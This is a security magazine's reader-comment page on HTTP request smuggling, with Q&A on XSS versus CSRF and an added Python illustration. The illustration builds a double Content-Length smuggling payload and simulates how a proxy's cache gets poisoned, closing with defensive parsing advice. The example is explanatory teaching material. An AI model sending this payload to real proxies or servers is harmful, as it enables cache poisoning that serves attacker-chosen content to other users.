Palisade Magazine

Discuss: Identifying HTTP Request Smuggling attacks

by Siddharth Anbalahan
Discussion is open; there are 3 reader comments.
1. Arvind | 04 Nov 2006 2:53 PM

First of all...Nice read !!

I have a couple of questions though:

1. XSS/XST mentions that the user needs to click on the link through his email so that the malicious request is sent to the attacker's server. This results in the cookie information (session cookie??) being sent to the attacker. Then the attacker can log in to the user's account using the recently obtained cookie information. Right??

2. Cross-site request forgery also mentions that a session cookie is sent back to the server and the user needs to be logged in to his Netbanking session. This sounds like something similar to XSS.

Obviously there is a difference... but I'm not able to catch it. Is CSRF just a variation of XSS or is there some little detail I've missed?

Secondly, apart from the article linked to "HTTP Request smuggling attacks", is there a quick example of a dummy "malicious attack string" you can give a reference to which an attacker would send to poison the web proxy server's cache? I don't want a real-life string... just a possible "attack string".

Cheers
Arvind

Arvind,

First of all... Thanks for your appreciation.

Let me answer your queries.

(1) As you said, while the user needs to click on the link in the malicious email, the request is not actually sent to the attacker's server but the target website vulnerable to XSS. The response from the website is what leads to the script execution that sends the session-cookie information to the attacker.

(2) As for CSRF, no information is actually sent to the attacker. Instead the attacker sends an email that seems to have a link to some other website. When the user clicks on the link, the request is sent to the target website and, due to the browser feature, the cookie corresponding to the website is automatically included in the request. This enables an attacker to directly execute a command in the form of a request without accessing the application directly.

So primarily, in XSS, the attacker attempts to obtain the session cookie but in CSRF, the attacker attempts to execute a request at the target application.

To learn more about CSRF, you can refer to our article on Session Riding from the August 2006 issue at http://palisade.plynt.com/issues/2006Aug/session-riding/

(3) The example request available in the whitepaper 'HTTP Request Smuggling' published by Watchfire gives a clear idea about what kind of an attack string can be used to poison a web proxy server's cache. The paper is available at http://www.watchfire.com/resources/HTTP-Request-Smuggling.pdf

Hope I have cleared your doubts.

Thanks,
Balaji.V
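As an added illustration for the third question (this is not part of the article, the comments, or the Watchfire paper), the Python sketch below constructs a double Content-Length attack string of the kind the classic cache-poisoning write-ups describe and runs it through a minimal HTTP/1.1 request splitter that can be told which Content-Length header to honour. The host name, the paths /foobar.html, /poison.html and /victim.html, the dummy "Bla:" header, and the assumption that the proxy honours the last Content-Length while the origin server honours the first are all illustrative choices made for this example, not facts about any particular product.

```python
# Added example, not from the original page: a constructed double
# Content-Length smuggling string and a toy parser that shows how a proxy
# and an origin server can disagree about where the first request ends.
# Which side honours which header is an assumption for illustration.

CRLF = b"\r\n"


def content_lengths(header_lines):
    """Return every Content-Length value in a list of header lines, in order."""
    values = []
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "content-length":
            values.append(int(value.strip()))
    return values


def split_requests(stream: bytes, honour: str) -> list:
    """Split a keep-alive byte stream into (method, path, body) tuples.

    honour is "first" or "last": which Content-Length wins when a request
    carries more than one.  That disagreement is what the attack exploits.
    """
    requests = []
    pos = 0
    while pos < len(stream):
        end = stream.find(CRLF + CRLF, pos)
        if end == -1:
            break  # incomplete trailing request: stop parsing
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        method, path, _version = lines[0].split(" ", 2)
        lengths = content_lengths(lines[1:])
        length = 0
        if lengths:
            length = lengths[0] if honour == "first" else lengths[-1]
        body_start = end + 4
        requests.append((method, path, stream[body_start:body_start + length]))
        pos = body_start + length
    return requests


def build_attack(host: bytes = b"SITE") -> bytes:
    """Build the constructed attack string (assumed layout, not a real capture).

    The carrier POST carries Content-Length: 0 and Content-Length: <n>.
    A party honouring <n> treats the smuggled GET /poison.html prefix as the
    POST body; a party honouring 0 parses that prefix as a fresh request whose
    'Bla:' header swallows the GET /victim.html request line that follows it.
    """
    smuggled_prefix = (b"GET /poison.html HTTP/1.1" + CRLF
                       + b"Host: " + host + CRLF
                       + b"Bla: ")  # no CRLF: the next request line becomes its value
    victim = (b"GET /victim.html HTTP/1.1" + CRLF
              + b"Host: " + host + CRLF
              + b"Connection: Keep-Alive" + CRLF + CRLF)
    carrier = (b"POST /foobar.html HTTP/1.1" + CRLF
               + b"Host: " + host + CRLF
               + b"Connection: Keep-Alive" + CRLF
               + b"Content-Type: application/x-www-form-urlencoded" + CRLF
               + b"Content-Length: 0" + CRLF
               + b"Content-Length: " + str(len(smuggled_prefix)).encode() + CRLF
               + CRLF)
    return carrier + smuggled_prefix + victim


def poisoned_cache(stream: bytes) -> dict:
    """Simulate the proxy pairing origin responses with the requests *it* parsed."""
    proxy_view = split_requests(stream, honour="last")
    server_view = split_requests(stream, honour="first")
    # The origin answers each request it saw, in order.
    responses = [f"<response for {path}>" for _m, path, _b in server_view]
    cache = {}
    for (method, path, _b), resp in zip(proxy_view, responses):
        if method == "GET":  # the proxy caches what it believes is the GET's answer
            cache[path] = resp
    return cache


if __name__ == "__main__":
    attack = build_attack()
    print("proxy sees :", [p for _m, p, _b in split_requests(attack, "last")])
    print("server sees:", [p for _m, p, _b in split_requests(attack, "first")])
    print("cache      :", poisoned_cache(attack))
```

With the assumed host the second Content-Length works out to 44, the proxy parses the stream as POST /foobar.html followed by GET /victim.html, the origin parses it as POST /foobar.html followed by GET /poison.html, and the proxy ends up caching the /poison.html response under the /victim.html key. The practical check is in split_requests: any parser that silently accepts two Content-Length headers (or a Content-Length alongside Transfer-Encoding) on the same message is a candidate for this kind of desynchronisation, and the safe behaviour is to reject such a request outright rather than pick one value.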

3. Arvind | 14 Nov 2006 1:26 PM

Thanks Balaji .. that clarified it somewhat. Will check out the links later to clarify the matter further.

Appreciate the detailed response.

Cheers
Arvind
